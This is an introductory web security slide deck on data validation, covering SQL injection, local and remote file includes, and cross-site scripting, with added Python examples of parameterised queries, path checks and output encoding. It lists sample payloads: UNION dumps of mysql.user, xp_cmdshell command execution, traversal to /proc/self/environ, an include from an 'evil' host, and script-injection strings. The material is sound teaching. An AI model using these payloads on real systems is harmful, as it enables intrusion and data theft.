Web Application Security 101 - 14 Data Validation

Data Validation
Common input validation problems.

Types Of Problems
SQL Injection
Local File Includes
Cross-site Scripting

SQL Injection
SQL Injection is an attack where a partial or a complete SQL query is inserted/injected into another query run by the targeted application.

Types Of SQL Injection
Vanilla - when errors are displayed.
Blind - when no errors are displayed.

SQL Backends
There are multiple SQL backends that have various features.
Common Backends
MsSQL (Transact-SQL)
MySQL
PostgreSQL
Oracle (PL/SQL)
Many More

SQL Injection In Principle
Works by injecting SQL fragments into already existing queries.
SELECT * FROM table WHERE column = 'injected by the user'

In Detail
Assuming that $value is a variable controlled by the user:
$query = "SELECT * FROM table WHERE column = '" . $value . "'";
When $value equals ' OR '1'='1 then:
SELECT * FROM table WHERE column = '' OR '1'='1'
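The concatenation above, run against a database, next to the parameterised form that defeats it. This is an added example and not code from the slides; it uses Python's built-in sqlite3 with a constructed three-row users table, so the difference in returned rows can be observed directly:

```python
import sqlite3

# Constructed sample data (not from the slides): three users in an in-memory DB.
USERS = [("alice", "a@example.com"), ("bob", "b@example.com"), ("carol", "c@example.com")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn

def lookup_concat(conn, value):
    # Vulnerable: mirrors the slide's $query, built by string concatenation.
    query = "SELECT * FROM users WHERE name = '" + value + "'"
    return conn.execute(query).fetchall()

def lookup_param(conn, value):
    # Hardened: the value is bound as a parameter and is never parsed as SQL.
    return conn.execute("SELECT * FROM users WHERE name = ?", (value,)).fetchall()

def demo():
    """Return (rows from the concatenated query, rows from the parameterised query)
    for the slide's payload ' OR '1'='1."""
    conn = make_db()
    payload = "' OR '1'='1"
    return len(lookup_concat(conn, payload)), len(lookup_param(conn, payload))

if __name__ == "__main__":
    print(demo())  # (3, 0): every row leaks via concatenation, none via a parameter
```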

SQL Injection Techniques
Union Selection - to obtain values from other tables.
SELECT * FROM table WHERE column = '' UNION SELECT 'a','b','c','d','e'
Boolean Selection - to create universally true or false statements.
SELECT * FROM table WHERE column = '' OR '1'='1'
Time Selection - to detect an injection by timing the query's execution.
SELECT * FROM table WHERE column = '' OR IF(1=1, sleep(10), 'false')--'

MsSQL Injection Techniques
Table enumeration - find the table structure.
SELECT * FROM table WHERE column = '' HAVING 1=1--'
SELECT * FROM table WHERE column = '' GROUP BY column1,columnN HAVING 1=1--
Code execution - running arbitrary commands.
SELECT * FROM table WHERE column = ''; exec master.dbo.xp_cmdshell 'command
Query delay - timing delay after query.
SELECT * FROM table WHERE column = ''; WAITFOR DELAY '0:0:30'

MySQL Injection Techniques Pt. 1
Finding information - retrieving various server variables and functions.
SELECT * FROM table WHERE column = '' AND 1=0 UNION SELECT @@version, 'b',
User enumeration - retrieving MySQL server users and passwords.
SELECT * FROM table WHERE column = '' UNION SELECT * FROM mysql.user#'

MySQL Injection Techniques Pt. 2
Table enumeration - retrieving MySQL server tables.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.tables#
Column enumeration - retrieving MySQL server columns.
SELECT * FROM t WHERE c = '' UNION SELECT * FROM information_schema.columns#

SQL Injection Tools
Sqlninja
Sqlmap

SQL Injection Is Art
There are many different types of tools and techniques, with various levels of complexity, used to exploit SQL Injection vulnerabilities.

File Includes
This attack vector is used to perform arbitrary file/URL read or execution using low-level functions and application-specific features.

Types Of File Includes
Local File Include - when the included file is local.
Remote File Include - when the included file is fetched remotely.

File Include In Principle
Works when user data reaches a function used to fetch a file.
<?php fetchfile("./path/to/file/injected by the user") ?>

In Detail
Assuming that $value is a variable controlled by the user:
<?php fetchfile("./path/to/file/" . $value) ?>
When $value equals ../../../index.php then:
<?php fetchfile("./path/to/file/../../../index.php") ?>

File Include Techniques Pt. 1
Usage of ../ to traverse the directory structure.
<?php fetchfile("./path/to/file/../../../index.php") ?>
Usage of null (0x00) to terminate strings for low level C functions.
<?php fetchfile("./path/to/file/../../../index.php\0.txt") ?>

File Include Techniques Pt. 2
Usage of an overlong-encoded dot (0xc0, 0xae) to bypass escape functions.
<?php fetchfile("./path/to/file/\xc0\xae./../../index.php\0.txt") ?>
Usage of system resources to cause other behaviour.
<?php fetchfile("./path/to/file/../../../../../proc/self/environ") ?>
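A validation routine for the user-supplied path that rejects each of the payloads on the two technique slides (../ traversal, the embedded NUL, the overlong dot, and /proc/self/environ). This is an added example, not code from the slides; it is Python rather than PHP, and BASE_DIR is an assumed document root standing in for the slides' "./path/to/file":

```python
import os

# Assumed document root for the include; stands in for "./path/to/file" on the slides.
BASE_DIR = os.path.realpath("./path/to/file")

def safe_include_path(raw):
    """Return the canonical path for the user-supplied name `raw` (the slides' $value)
    if it stays inside BASE_DIR, otherwise None. `raw` may be str or raw request bytes."""
    if isinstance(raw, bytes):
        # Strict UTF-8 decoding rejects overlong forms such as \xc0\xae for ".".
        try:
            raw = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    if "\0" in raw:
        # An embedded NUL would truncate the name inside C-level file functions.
        return None
    candidate = os.path.realpath(os.path.join(BASE_DIR, raw))
    # Compare as directory components, not as a string prefix (BASE_DIR vs BASE_DIR2).
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    return candidate

def check_slide_payloads():
    """Run the slides' traversal payloads plus one benign name through the check."""
    return {
        "plain": safe_include_path("readme.txt") is not None,
        "traversal": safe_include_path("../../../index.php"),
        "nul": safe_include_path("../../../index.php\0.txt"),
        "overlong": safe_include_path(b"\xc0\xae./../../index.php\0.txt"),
        "proc": safe_include_path("../../../../../proc/self/environ"),
    }

if __name__ == "__main__":
    print(check_slide_payloads())  # only "plain" is accepted; the rest are None
```

Canonicalising with realpath before the prefix check is what makes the ../ sequences harmless; checking the raw string for ".." alone would miss encoded variants.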

Remote File Includes
This type of problem occurs when the included file is a remote one controlled by the attacker. In this case the attacker has greater control over the exploitation process, since the contents of the file can be prepared specially for it.
<?php fetchfile("http://evil/path/to/file") ?>

FI Is Art
File Include attacks are a popular mechanism for compromising web applications.

Cross-site Scripting
Cross-site scripting is a type of vulnerability where an attacker can bypass the SOP (Same Origin Policy) through client-side injection or by abusing certain forms of configuration.

Types Of XSS
Reflected - when the injection is immediately returned.
Stored - when the injection is stored.
DOM-based - when the injection occurs due to JS.
Others - there are many other uncategorized variants.

XSS In Principle
Works by injecting fragments of HTML/JS inside the web page.
<span>injected by the user</span>

In Detail
Assuming that $value is a variable controlled by the user:
<?php ?><span><?php echo $value ?></span>
When $value equals <script>alert(1)</script> then:
<span><script>alert(1)</script></span>

XSS Techniques Pt. 1
When script tags are sanitized or escaped.
<span><img src=a onerror=alert(1)></span>
When the injection occurs inside an event attribute.
<button onclick="alert(1)"></button>

XSS Techniques Pt. 2
When the injection occurs inside a script tag.
<script>var a = ""; alert(1); "";</script>
When the injection occurs in multiple small places.
<span><script>alert(1)/* is something like */</script></span>
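Output encoding chosen per context, covering the three injection points on the preceding slides: the HTML body (the span), a quoted attribute, and a JavaScript string inside a script tag. This is an added example, not code from the slides; it is Python rather than PHP, and the title attribute and the function names are assumptions for illustration:

```python
import html
import json

def encode_for_html_body(value):
    # Context: <span>...</span>. Escapes & < > so no tag can be opened.
    return html.escape(value, quote=False)

def encode_for_html_attribute(value):
    # Context: <button title="..."> with the attribute quoted in the template.
    # Quotes are escaped so the value cannot break out and add an event handler.
    # Event-handler attributes (onclick=...) are JS, not HTML: never place user
    # data in them at all.
    return html.escape(value, quote=True)

def encode_for_js_string(value):
    # Context: <script>var a = "...";</script>. JSON-encode the value and also
    # escape "</" so a value containing </script> cannot close the block early.
    return json.dumps(value).replace("</", "<\\/")

def render_span(value):
    return "<span>" + encode_for_html_body(value) + "</span>"

def render_button(value):
    return '<button title="' + encode_for_html_attribute(value) + '"></button>'

def render_script(value):
    return "<script>var a = " + encode_for_js_string(value) + ";</script>"

if __name__ == "__main__":
    # The slides' payloads, each rendered in the context it targets.
    print(render_span("<script>alert(1)</script>"))
    print(render_button('" onclick="alert(1)'))
    print(render_script('"; alert(1); "'))
```

Using the body encoder in the attribute or script context is the usual mistake: html.escape alone leaves a JS string injection intact, which is why the encoder has to match the context the value lands in.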

Stored XSS
The injection is temporarily or permanently stored.
<?php $_SESSION['name'] = $_GET['name'] ?>
Later on, this code causes the XSS to occur:
<?php ?><span><?php echo $_SESSION['name'] ?></span>

DOM-based XSS
The injection may occur at any point but is triggered via JavaScript.
<script>var match = document.location.search.match(/[?&]name=(\w+)/);
if (match) { document.write("Hello " + match[1]);}</script>
There are many different ways an injection can occur.

Other Forms Of XSS
The presence of crossdomain.xml may open the app to XSS.
<?xml version="1.0" encoding="UTF-8" ?><cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>

XSS Is Art
Cross-site scripting is a very popular and widespread vulnerability.

Other Input Validation Flaws
Memory Corruption
Command Injection
LDAP Injection
XML Injection
XPATH Injection
SSI Injection
Remote File Inclusion
Many, Many More

Lab
We will be finding data validation problems.